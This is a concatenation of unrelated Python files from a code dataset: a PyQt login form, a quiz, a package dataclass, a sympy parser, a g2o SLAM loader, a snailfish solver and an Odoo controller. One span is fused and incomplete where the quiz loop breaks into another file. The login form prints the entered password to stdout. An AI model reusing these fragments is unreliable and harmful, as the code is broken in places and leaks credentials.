self.show()\n\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(640, 480)\n Form.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n Form.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n Form.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.horizontalLayoutWidget = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 641, 481))\n self.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(\n self.horizontalLayoutWidget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label = QtWidgets.QLabel(self.horizontalLayoutWidget)\n self.label.setStyleSheet(\"border-image: url(:/images/4419038.jpg);\")\n self.label.setText(\"\")\n self.label.setObjectName(\"label\")\n self.horizontalLayout.addWidget(self.label)\n self.frame = QtWidgets.QFrame(self.horizontalLayoutWidget)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.frame)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 321, 481))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n 
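# vertical layout that stacks the login form widgets\n        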
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setContentsMargins(10, 0, 10, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget)\n self.label_2.setMaximumSize(QtCore.QSize(16777215, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.label_2.setFont(font)\n self.label_2.setAlignment(QtCore.Qt.AlignCenter)\n self.label_2.setObjectName(\"label_2\")\n self.verticalLayout.addWidget(self.label_2)\n self.lineEdit = QtWidgets.QLineEdit(self.verticalLayoutWidget)\n self.lineEdit.setMinimumSize(QtCore.QSize(0, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(13)\n font.setBold(True)\n font.setWeight(75)\n self.lineEdit.setFont(font)\n self.lineEdit.setStyleSheet(\"border-radius: 25px;\\n\"\n \"border: 1px solid black;\")\n self.lineEdit.setAlignment(QtCore.Qt.AlignCenter)\n self.lineEdit.setObjectName(\"lineEdit\")\n self.verticalLayout.addWidget(self.lineEdit)\n self.lineEdit_2 = QtWidgets.QLineEdit(self.verticalLayoutWidget)\n self.lineEdit_2.setMinimumSize(QtCore.QSize(0, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(13)\n font.setBold(True)\n font.setWeight(75)\n self.lineEdit_2.setFont(font)\n self.lineEdit_2.setStyleSheet(\"border-radius: 25px;\\n\"\n \"border: 1px solid black;\")\n self.lineEdit_2.setAlignment(QtCore.Qt.AlignCenter)\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\n # self.lineEdit_2.setEchoMode(QLieEdit.Password)\n self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)\n\n self.verticalLayout.addWidget(self.lineEdit_2)\n self.label_3 = QtWidgets.QLabel(self.verticalLayoutWidget)\n self.label_3.setEnabled(True)\n self.label_3.setMinimumSize(QtCore.QSize(0, 20))\n self.label_3.setMaximumSize(QtCore.QSize(16777215, 30))\n self.label_3.hide()\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setBold(True)\n font.setWeight(75)\n self.label_3.setFont(font)\n self.label_3.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.label_3.setAlignment(QtCore.Qt.AlignCenter)\n self.label_3.setObjectName(\"label_3\")\n self.verticalLayout.addWidget(self.label_3)\n self.frame_2 = QtWidgets.QFrame(self.verticalLayoutWidget)\n self.frame_2.setMaximumSize(QtCore.QSize(16777215, 65))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.horizontalLayoutWidget_2 = QtWidgets.QWidget(self.frame_2)\n self.horizontalLayoutWidget_2.setGeometry(QtCore.QRect(0, 0, 301, 61))\n self.horizontalLayoutWidget_2.setObjectName(\"horizontalLayoutWidget_2\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(\n self.horizontalLayoutWidget_2)\n self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.pushButton_2 = QtWidgets.QPushButton(\n self.horizontalLayoutWidget_2)\n self.pushButton_2.setMaximumSize(QtCore.QSize(16777215, 65))\n #* event\n self.pushButton_2.clicked.connect(self.buttonClicked_exit)\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.pushButton_2.setFont(font)\n self.pushButton_2.setStyleSheet(\"\\n\"\n \"QPushButton{\\n\"\n \"border-radius: 25px;\\n\"\n \"background-color: rgb(255, 0, 0);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover{\\n\"\n \"background-color: 
rgb(195, 37, 37);\\n\"\n \"}\\n\"\n \"QPushButton:pressed{\\n\"\n \"background-color: #e7e7e7; \\n\"\n \"color: black;\\n\"\n \"}\\n\"\n \"\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.horizontalLayout_3.addWidget(self.pushButton_2)\n self.pushButton = QtWidgets.QPushButton(self.horizontalLayoutWidget_2)\n self.pushButton.setMaximumSize(QtCore.QSize(16777215, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.pushButton.setFont(font)\n self.pushButton.setStyleSheet(\"QPushButton{\\n\"\n \"border-radius: 25px;\\n\"\n \"background-color: rgb(62, 96, 168);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover{\\n\"\n \"background-color: rgb(51, 80, 138);\\n\"\n \"}\\n\"\n \"QPushButton:pressed{\\n\"\n \"background-color: #e7e7e7; \\n\"\n \"color: black;\\n\"\n \"}\\n\"\n \"\")\n self.pushButton.setObjectName(\"pushButton\")\n self.horizontalLayout_3.addWidget(self.pushButton)\n\n self.pushButton.clicked.connect(self.buttonClicked_login)\n # self.pushButton.clicked.connect(functools.partial(self.buttonClicked_login,statusOfPostLogin))\n\n self.verticalLayout.addWidget(self.frame_2)\n self.horizontalLayout.addWidget(self.frame)\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def buttonClicked_exit(self):\n # sender = self.sender()\n print(self.lineEdit.text())\n print(self.lineEdit_2.text())\n sys.exit()\n\n def buttonClicked_login(self):\n #todo\n statusOfPostLogin=Network.post_login(email=self.lineEdit.text(),password=self.lineEdit_2.text())\n print(\"statusOfLogin\")\n print(statusOfPostLogin)\n if statusOfPostLogin == 400:\n self.label_3.show()\n elif statusOfPostLogin == 200:\n self.label_3.hide()\n self.close()\n os.system('python product\\product.py')\n # sys.exit(app.exec_())\n # sys.exit()\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\n self.label_2.setText(_translate(\"Form\", \"به فروشگاه اسپاد خوش آمدید.\"))\n self.lineEdit.setPlaceholderText(_translate(\"Form\", \"ایمیل\"))\n self.lineEdit_2.setPlaceholderText(_translate(\"Form\", \"پسوورد\"))\n self.label_3.setText(_translate(\n \"Form\", \"اطلاعات وارد شده صحیح نمی باشد.\"))\n self.pushButton_2.setText(_translate(\"Form\", \"خروج\"))\n self.pushButton.setText(_translate(\"Form\", \"ورود\"))\n\n\n# if __name__ == \"__main__\":\n# app = QtWidgets.QApplication(sys.argv)\n# Form = QtWidgets.QWidget()\n# ui = Ui_Form()\n# ui.setupUi(Form)\n# Form.show()\n# # Form.close()\n# sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n ex = Ui_Form()\n sys.exit(app.exec_())","repo_name":"hoshang1371/desktop-app-fpr-spad-elec","sub_path":"login/logIn_Ui.py","file_name":"logIn_Ui.py","file_ext":"py","file_size_in_byte":10255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36885472679","text":"def my_fun():\r\n\ti=1\r\n\twhile i<=5:\r\n\t\tprint()\r\n\t\tprint(\"who is the Founder of facebook\")\r\n\t\ta=[\"- mark zuckerberg\",\"- bill gates\",\"- steve jebs\",\"- Larry page\"]\r\n\t\tj=0\r\n\t\twhile j str:\n return self.name.lower().replace(\"_\", \"-\")\n\n @classmethod\n def from_cli_argument(cls, cli_argument: str):\n try:\n return cls[cli_argument.upper().replace(\"-\", \"_\")]\n except KeyError as error:\n raise ArgumentError(\n None, f\"Invalid reason '{cli_argument}'\"\n ) from error\n\n\n@dataclass()\nclass Package:\n 
name: str\n version: str\n release: str\n reasons: Dict[Reasons, Direction] = field(default_factory=dict)\n\n def __hash__(self) -> int:\n return hash((self.name, self.version, self.release))\n\n def __eq__(self, other: \"Package\") -> bool:\n return (\n self.name == other.name\n and self.version == other.version\n and self.release == other.release\n and self.reasons == other.reasons\n )\n\n def __lt__(self, other: \"Package\") -> bool:\n # Sort by release first, then the other fields\n if self.release != other.release:\n return self.release < other.release\n if self.name != other.name:\n return self.name < other.name\n if self.version != other.version:\n return self.version < other.version\n\n return False\n\n def __str__(self) -> str:\n result = f\"{self.name : <50} {self.version : <40} {self.release : <10}\"\n\n reasons = \", \".join(\n f\"{change}\"\n f\"{' in new package' if direction == Direction.PASSIVE else ''}\"\n for change, direction in self.reasons.items()\n )\n result += f\"{reasons : <10}\"\n\n return result\n","repo_name":"greenbone/troubadix","sub_path":"troubadix/standalone_plugins/changed_packages/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"70466363735","text":"#!/usr/bin/py\n# -*- coding: UTF-8 -*-\nfrom sympy import *\n\ndef parseProblem(myProblem):\n myProblem = myProblem.split(\"\\n\")\n \n if myProblem[0].upper() == \"MAXIMIZAR\":\n act = 1\n elif myProblem[0].upper() == \"MINIMIZAR\":\n act = 0\n else:\n return None\n del myProblem[0]\n\n funcion = myProblem[0].split('=')\n variables = funcion[0].replace(' ', '').strip('fgh()').split(',')\n funcion = funcion[1].replace('^', '**')\n del myProblem[0]\n\n p = myProblem[0].replace(' ','')\n if p[0].upper()==\"P\":\n p = p.strip('p=()').split(',')\n else:\n p = [0, 0]\n\n return act, variables, funcion, p\n\ndef parseFunction(f, varbls):\n return str(N(f(*flatten(varbls)), 4)).replace('**', '^').replace('*', '')\n\ndef parseVarbls(varbls):\n return str(varbls).replace('[', '').replace(']', '')\n\ndef writeDoc(act, variables, funcion, point):\n document = open(\"../data/data.in\",\"w\")\n document.write(str(act)+\"\\n\")\n for var in variables:\n document.write(var+\" \")\n document.write(\"\\n\"+funcion+\"\\n\")\n for var in point:\n document.write(var+\" \")\n document.close()\n\n\ndef getDataSalida():\n file = open(\"../data/data.out\", \"r\")\n lineas = file.readlines()\n cadena = \"\"\n for i in range(len(lineas)):\n for j in range(len(lineas[i])):\n cadena += lineas[i][j]\n return cadena\n\n\nif __name__ == \"__main__\":\n myProblem = \"Maximizar\\n\\\nf(x1,x2) = -(x1-3)^2-x1*(x2-2)^2\\n\\\np = (0,0)\"\n result = parseProblem(myProblem)\n print(result)\n writeDoc(result[0],result[1],result[2], result[3])","repo_name":"csembriz/Gradiente-Newton","sub_path":"src/Parse.py","file_name":"Parse.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8167331197","text":"#!/usr/bin/python3\n\n''' Module that reads (n) lines of a text file and prints to stdout'''\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n\n ''' Read (n) lines of file and print to stdout'''\n\n total_lines = 0\n with open(filename, encoding='utf-8') as a_file:\n for a_line in a_file:\n total_lines += 1\n if nb_lines <= 0 or nb_lines >= total_lines:\n print(a_line, 
end='')\n","repo_name":"cnov20/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26141238699","text":"from math import inf\nimport numpy as np\nfrom utils.lib.least_squares import LeastSquares as LS\nfrom utils.lib.triangulation import Triangulation as TRI\nfrom collections import namedtuple, defaultdict\nfrom utils.helper import from_uppertri_to_full, wrap2pi\n\ndef load_g2o_graph(filename: str, gt: bool, descriptor: bool):\n \n print(f\"Loading file: {filename[15:-20]}\")\n\n Edge = namedtuple(\n 'Edge', ['Type', 'nodeFrom', 'nodeTo', 'poseMeasurement', 'information'] # g2o format of files.\n )\n\n edges = []\n nodes = {}\n nodeTypes = {}\n lm_status = {}\n initial_b_guess = False\n initial_qualified_guess = True\n \n with open(filename, 'r') as file:\n for line in file:\n \n data = line.split() \n \n if data[0] == 'VERTEX_SE2':\n\n nodeType = 'VSE2'\n nodeId = int(data[1])\n pose = np.array(data[2:5],dtype=np.float64)\n nodes[nodeId] = pose\n nodeTypes[nodeId] = nodeType\n\n elif data[0] == 'VERTEX_XY':\n\n nodeType = 'VXY'\n nodeId = int(data[1])\n landmark = np.array(data[2:4],dtype=np.float64) \n nodes[nodeId] = landmark\n nodeTypes[nodeId] = nodeType\n \n\n elif data[0] == 'VERTEX_GPS':\n \n nodeType = 'VGPS'\n nodeId = int(data[1])\n gps_point = np.array(data[2:4],dtype=np.float64)\n nodes[nodeId] = gps_point\n nodeTypes[nodeId] = nodeType\n\n elif data[0] == 'EDGE_SE2':\n \n Type = 'P' #Pose type\n nodeFrom = int(data[1])\n nodeTo = int(data[2])\n poseMeasurement = np.array(data[3:6], dtype=np.float64)\n upperTriangle = np.array(data[6:12], dtype=np.float64)\n information = from_uppertri_to_full(upperTriangle,3)\n edge = Edge(Type, nodeFrom, nodeTo, poseMeasurement, information)\n edges.append(edge)\n \n\n elif data[0] == 'EDGE_SE2_XY':\n \n Type = 'L' #Landmark type\n nodeFrom = int(data[1])\n nodeTo = int(data[2])\n \n poseMeasurement = np.array(data[3:5],dtype=np.float64)\n upperTriangle = np.array(data[5:8],dtype=np.float64)\n information = from_uppertri_to_full(upperTriangle,2)\n \n edge = Edge(Type, nodeFrom, nodeTo, poseMeasurement, information)\n edges.append(edge)\n \n\n elif data[0] == 'EDGE_SE2_GPS':\n \n Type = 'G' #GPS type\n nodeFrom = int(data[1])\n nodeTo = int(data[2]) \n poseMeasurement = np.array(data[3:5],dtype=np.float64)\n upperTriangle = np.array(data[5:8],dtype=np.float64)\n information = from_uppertri_to_full(upperTriangle,2)\n\n edge = Edge(Type, nodeFrom,nodeTo, poseMeasurement, information)\n edges.append(edge)\n\n elif data[0] == 'EDGE_SE2_BEARING':\n\n descriptor = True\n Type = 'B' #Bearing type\n nodeFrom = int(data[1])\n nodeTo = int(data[2])\n poseMeasurement = float(data[3])\n information = float(data[4])\n\n if initial_b_guess:\n initial_bearing_guess(nodes, nodeFrom, nodeTo, nodeTypes, poseMeasurement, lm_status)\n\n edge = Edge(Type, nodeFrom, nodeTo, poseMeasurement, information)\n edges.append(edge)\n\n \n else: \n print(\"Error, edge or vertex not defined\")\n\n lut, x = update_info(nodes)\n \n if gt==False and initial_qualified_guess:\n \n print(\"Noisy data\")\n nodes, nodeTypes, unused_lm = qualified_guess(edges, lut, x, nodes, nodeTypes, least_squares=True, triangulation=False, epsilon=1.0)\n edges, nodes, nodeTypes = remove_unused_landmark(edges, nodes, nodeTypes, unused_lm)\n lut, x = update_info(nodes)\n \n 
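# deferred import: Graph lives in run_slam\n    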
from run_slam import Graph\n graph = Graph(x, nodes, edges, lut, nodeTypes,descriptor)\n\n print('Loaded graph with {} nodes and {} edges'.format(len(graph.nodes), len(graph.edges)))\n print('\\n')\n\n return graph\n\ndef update_info(nodes):\n\n lut = {}\n x = []\n offset = 0\n\n for nodeId in nodes:\n lut.update({nodeId: offset})\n offset = offset + len(nodes[nodeId])\n x.append(nodes[nodeId])\n x = np.concatenate(x, axis=0)\n\n return lut, x\n\ndef remove_unused_landmark(edges, nodes, nodeTypes, unused_lm):\n\n for edge in edges.copy():\n\n if edge.nodeTo in unused_lm:\n print(f\"edgenodes to:{edge.nodeTo}\\n\")\n edges.remove(edge)\n\n\n # Checking nodes\n for ID, _ in nodes.copy().items():\n \n for lm_ID in unused_lm:\n check = True if lm_ID == ID else False\n\n if check:\n del nodes[ID]\n \n # Checking nodetypes\n for ID, _ in nodeTypes.copy().items():\n for lm_ID in unused_lm:\n check = True if lm_ID == ID else False\n\n if check:\n del nodeTypes[ID]\n\n \n return edges, nodes, nodeTypes\n\ndef qualified_guess(edges, lut, x, nodes, nodeTypes, least_squares: bool, triangulation: bool, epsilon: float):\n\n ls = LS()\n tri = TRI()\n mem = defaultdict(list)\n unused_lm = []\n k = 0\n count = 0\n\n for e in edges:\n if e.Type == 'B':\n lost_bearings = []\n _nodePose = e.nodeFrom\n _nodeLm = e.nodeTo\n \n fromIdx = lut[_nodePose]\n x_b = x[fromIdx:fromIdx+3] # Robot pose\n z_ij = e.poseMeasurement # Bearing measurement\n\n if count > 0 and check_parallel_lines(_x_b, _z_ij, x_b, z_ij, epsilon=epsilon):\n k +=1\n \n continue\n else:\n _meas = [x_b[0], x_b[1], x_b[2], z_ij]\n mem[_nodeLm].append(_meas)\n\n _x_b = x_b # Updating old value\n _z_ij = z_ij # Updating old value\n count += 1\n \n\n for ID, meas in mem.items():\n\n m = np.vstack(meas)\n Xr = m[:,0:3]\n z_list = list(m[:,3])\n\n if len(z_list) > 2: # n or more measurements are required for triangulation\n if least_squares:\n Xl = ls.least_squares_klines(Xr, z_list) # Computing least squares best guess\n elif triangulation:\n Xl = tri.triangulation(Xr, z_list) # Computing triangulation best guess\n\n landmark = np.array([Xl[0,0], Xl[1,0]], dtype=np.float64)\n nodeType = 'VXY'\n nodeId = ID\n nodes[nodeId] = landmark\n nodeTypes[nodeId] = nodeType\n\n elif ID not in unused_lm:\n unused_lm.append(ID)\n\n del m\n return nodes, nodeTypes, unused_lm\n\n\ndef initial_bearing_guess(nodes, nodeFrom, nodeTo, nodeTypes, poseMeasurement, lm_status):\n\n x_b = nodes[nodeFrom]\n z_ij = poseMeasurement\n\n lm_status.update(dict([(nodeTo, False)]))\n \n for id, status in lm_status.items():\n if id == nodeTo and status == False:\n \n lambdadistx = 5\n lambdadisty = 5\n xguess = x_b[0]+lambdadistx*np.cos(wrap2pi(x_b[2]+z_ij))\n yguess = x_b[1]+lambdadisty*np.sin(wrap2pi(x_b[2]+z_ij))\n\n nodeType = 'VXY'\n nodeId = nodeTo\n landmark = np.array([xguess,yguess],dtype=np.float64) \n nodes[nodeId] = landmark\n nodeTypes[nodeId] = nodeType\n lm_status[nodeTo] = True\n\ndef check_parallel_lines(p1, z1, p2, z2, epsilon: float) -> bool:\n \"\"\"Checking for parallel lines\n\n Args:\n p1 (vector 3x1): Robot position at time i\n z1 (float): Bearing measurement at time i\n p2 (vector 3x1): Robot position at time j\n z2 (float): Bearing measurement at time j\n epsilon (float, optional): Threshold value. Parallax criterion. 
Defaults to 1.\n Returns:\n bool: True -> lines are parallel, False -> lines are not parallel\n \"\"\"\n n1 = wrap2pi(z1+p1[2])\n n2 = wrap2pi(z2+p2[2])\n\n diff = np.rad2deg(abs(wrap2pi(n1 - n2)))\n\n parallel = diff < epsilon\n\n return parallel","repo_name":"MJensen1231992/MSc_Proj_2021_SCL_MJ","sub_path":"graphSLAM/utils/g2o_loader.py","file_name":"g2o_loader.py","file_ext":"py","file_size_in_byte":8446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4661018489","text":"import nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nimport os\nimport json\nimport datetime\nimport numpy as np\nimport ml\nimport time\n\n\nERROR_THRESHOLD = 0.2\n# load our calculated synapse values\nsynapse_file = 'synapses.json' \nwith open(synapse_file) as data_file: \n synapse = json.load(data_file) \n synapse_0 = np.asarray(synapse['synapse0']) \n synapse_1 = np.asarray(synapse['synapse1'])\n\ndef classify(sentence, show_details=False):\n results = ml.think(sentence, show_details)\n\n results = [[i,r] for i,r in enumerate(results) if r>ERROR_THRESHOLD ] \n results.sort(key=lambda x: x[1], reverse=True) \n return_results =[[classes[r[0]],r[1]] for r in results]\n print (\"%s \\n classification: %s\" % (sentence, return_results))\n return return_results\n\nclassify(\"sudo make me a sandwich\")\nclassify(\"how are you today?\")\nclassify(\"talk to you tomorrow\")\nclassify(\"who are you?\")\nclassify(\"make me some lunch\")\nprint ()\nclassify(\"how was your lunch?\", show_details=True)","repo_name":"vikikkdi/College_Projects","sub_path":"web/f/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10660323668","text":"\"\"\"Escribe un programa que genere los primeros 4 números perfectos. Un número perfecto es un número entero \npositivo que es igual a la suma de sus divisores propios positivos. Dicho de otra forma, un número perfecto \nes aquel que es amigo de sí mismo. 
Thus, 6 is a perfect number because its proper positive divisors are \n1, 2 and 3; and 6 = 1 + 2 + 3.\"\"\"\n\nnumeros_perfectos = []\nnum = 1\n\nwhile len(numeros_perfectos) < 4:\n    suma = 0\n    for i in range(1, num):\n        if num % i == 0:\n            suma += i\n    if num == suma:\n        numeros_perfectos.append(num)\n    num += 1\n\nprint(\"The first 4 perfect numbers are:\")\n\nprint(numeros_perfectos)\n\n","repo_name":"RCNicolas/CAMPUS","sub_path":"Python/Ejercicios Review/Review 19 julio/Bucles/Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19756781940","text":"import fileinput\nimport math\nfrom copy import deepcopy\n\n\ndef parse():\n    pairs = []\n    for line in fileinput.input():\n        pairs.append(eval(line.strip()))\n    fileinput.close()\n    return pairs\n\n\ndef set_in_pair_with_directions(root, directions, value):\n    node = root\n    for dir in directions[:-1]:\n        node = node[dir]\n    node[directions[-1]] = value\n\n\ndef get_inorder(root):\n    regular_by_order = {}\n\n    def inorder(pair, order=0, directions=None):\n        if not directions:\n            directions = []\n        if isinstance(pair, int):\n            regular_by_order[order] = (pair, directions)\n            return order + 1, directions\n\n        order, _ = inorder(pair[0], order, directions + [0])\n        order, _ = inorder(pair[1], order, directions + [1])\n        return order, directions\n\n    pair = root\n    inorder(pair)\n\n    return regular_by_order\n\n\ndef traverse_explode(root):\n    def recurse(pair, depth=0, order=0, has_exploded=False):\n        if isinstance(pair, int):\n            return order + 1, depth, has_exploded\n\n        order, left_depth, has_exploded = recurse(\n            pair[0], depth + 1, order, has_exploded\n        )\n\n        if left_depth == 5 and isinstance(pair, list):\n            left, right = pair\n            if isinstance(left, int) and isinstance(right, int) and not has_exploded:\n                explode(root, left, right, order, regular_by_order)\n                has_exploded = True\n\n        order, right_depth, has_exploded = recurse(\n            pair[1], depth + 1, order, has_exploded\n        )\n\n        return order, max(left_depth, right_depth), has_exploded\n\n    regular_by_order = get_inorder(root)\n    pair = root\n    _, _, exploded = recurse(pair)\n    return root, exploded\n\n\ndef traverse_split(root):\n    def recurse(pair, has_splitted=False):\n        if isinstance(pair, int):\n            return has_splitted\n\n        left_splitted = recurse(pair[0], has_splitted)\n\n        if isinstance(pair[0], int) and pair[0] >= 10 and not has_splitted:\n            pair[0] = [math.floor(pair[0] / 2), math.ceil(pair[0] / 2)]\n            left_splitted = True\n\n        right_splitted = recurse(pair[1], left_splitted)\n\n        if isinstance(pair[1], int) and pair[1] >= 10 and not left_splitted:\n            pair[1] = [math.floor(pair[1] / 2), math.ceil(pair[1] / 2)]\n            right_splitted = True\n\n        return left_splitted or right_splitted\n\n    pair = root\n    splitted = recurse(pair)\n    return root, splitted\n\n\ndef explode(root, left, right, order, regular_by_order):\n    if order > 1:\n        leftmost, leftmost_directions = regular_by_order[order - 2]\n        set_in_pair_with_directions(root, leftmost_directions, left + leftmost)\n\n    if order < len(regular_by_order) - 1:\n        rightmost, rightmost_directions = regular_by_order[order + 1]\n        set_in_pair_with_directions(root, rightmost_directions, rightmost + right)\n    _, exploded_directions = regular_by_order[order - 1]\n    set_in_pair_with_directions(root, exploded_directions[:-1], 0)\n\n\ndef reduce(pair):\n    pair, exploded = traverse_explode(pair)\n    if exploded:\n        return reduce(pair)\n\n    pair, splitted = traverse_split(pair)\n    if 
splitted:\n return reduce(pair)\n return pair\n\n\ndef sum_pairs(pairs):\n pair = pairs[0]\n for next_pair in pairs[1:]:\n pair = add_pairs(pair, next_pair)\n pair = reduce(pair)\n return pair\n\n\ndef add_pairs(a, b):\n return [a, b]\n\n\ndef magnitude(pair):\n left, right = pair\n left_magnitude = 3 * left if isinstance(left, int) else 3 * magnitude(left)\n right_magnitude = 2 * right if isinstance(right, int) else 2 * magnitude(right)\n return left_magnitude + right_magnitude\n\n\ndef simulate(pairs):\n magnitudes = []\n for i, x in enumerate(pairs):\n for j, y in enumerate(pairs):\n if i != j:\n magnitudes.append(magnitude(sum_pairs([deepcopy(x), deepcopy(y)])))\n magnitudes.append(magnitude(sum_pairs([deepcopy(y), deepcopy(x)])))\n return max(magnitudes)\n\n\ndef main():\n pairs = parse()\n pair = sum_pairs(pairs)\n print(f\"Part 1: {magnitude(pair)}\")\n\n pairs = parse()\n print(f\"Part 2: {simulate(pairs)}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rodrigorahal/advent-of-code-2021","sub_path":"18/snailfish.py","file_name":"snailfish.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"9997424281","text":"from openerp import http\n\n\nclass OutboundSelectPackageController(http.Controller):\n @http.route('/outbound_select_package', type='http', auth='user')\n def select_package(self, **kw):\n env = http.request.env\n current_user = env['res.users'].browse(http.request.uid)\n\n return http.request.render('stock_irm.outbound_select_package', {\n 'status': 'ok',\n 'user_name': current_user.partner_id.name,\n 'worklocation_name': current_user.work_location_id.name,\n 'worklocation_id': current_user.work_location_id.id or 0,\n 'title': 'Outbound Select Package',\n 'user_email': current_user.partner_id.email,\n\n })\n\n @http.route('/outbound_select_package/process_package', auth='user',\n type='json')\n def process_package(self, barcode):\n env = http.request.env\n\n unpack = False\n\n # cart = env['stock.location'].browse(cart_id)\n scanned_package = env['stock.quant.package'].search(\n [('barcode', '=', str(barcode))]\n )\n\n if not scanned_package:\n return {\n 'status': 'error',\n 'error': 'Error',\n 'message': 'The scanned package could not be found.',\n }\n\n bo_cart_to_band_down = env['stock.picking.type'].search(\n [('is_bo_cart_to_band_down', '=', True)], limit=1)\n\n output_to_customer = env['stock.picking.type'].search(\n [('is_output_to_customer', '=', True)], limit=1)\n\n bo_cart_upstairs = bo_cart_to_band_down.default_location_src_id\n\n output_default_loc = output_to_customer.default_location_src_id\n\n current_location = scanned_package.location_id\n\n if current_location not in bo_cart_upstairs.child_ids\\\n and current_location not in output_default_loc.child_ids\\\n and current_location != output_default_loc\\\n and current_location != bo_cart_upstairs:\n return {\n 'status': 'error',\n 'error': 'Error',\n 'message': 'The scanned package should not be on banddown.',\n }\n\n if current_location in output_default_loc.child_ids \\\n or current_location == output_default_loc:\n unpack = True\n\n quant = scanned_package.quant_ids[0]\n picking = quant.reservation_id.picking_id\n procurement_group = picking.group_id\n procurement_group._procurement_order_state()\n is_complete = procurement_group.is_sale_order_complete\n\n if picking.picking_type_id.id == output_to_customer.id:\n env['report'].print_document(\n picking, 
'odw_report_delivery.report_delivery_master')\n\n wizard_id = picking.do_enter_transfer_details()['res_id']\n wizard = env['stock.transfer_details'].browse(wizard_id)\n destination = picking.location_dest_id\n\n wizard.write({\n 'item_ids': [(5, False, False)],\n 'packop_ids': [(5, False, False)]\n })\n\n # then create a new wizard item\n wizard_values = {\n 'package_id': scanned_package.id,\n 'destinationloc_id': destination.id,\n 'sourceloc_id': scanned_package.location_id.id,\n }\n\n wizard.write({\n 'packop_ids': [(0, False, wizard_values)]\n })\n\n wizard.sudo().do_detailed_transfer()\n\n if unpack:\n scanned_package.unpack()\n\n if is_complete and not unpack:\n scanned_package.auto_move_pack()\n\n return {'status': 'ok',\n 'is_complete': is_complete}\n\n @http.route('/outbound_select_package/get_package_ids', auth='user', type='json')\n def get_package_ids(self, cart_id):\n env = http.request.env\n cart = env['stock.location'].browse(cart_id)\n package_ids = env['stock.quant.package'].search(\n [('location_id', '=', int(cart.id))]\n )\n\n if not package_ids:\n return {\n 'status': 'error',\n 'error': 'Error',\n 'message': 'The cart does not contain any packages.',\n }\n\n package_list = []\n\n for package in package_ids:\n product = package.quant_ids[0].product_id\n quant = package.quant_ids[0]\n total_qty = 0\n for quant in package.quant_ids:\n total_qty += quant.qty\n\n package_list.append({\n 'package': {\n 'id': package.id,\n 'barcode': package.barcode,\n 'name': package.name,\n },\n 'product': {\n 'id': product.id,\n 'name': product.name,\n 'description': product.description or 'No description',\n 'quantity': total_qty,\n 'image': '/web/binary/image?model=product.product&id=%s&field=image' % 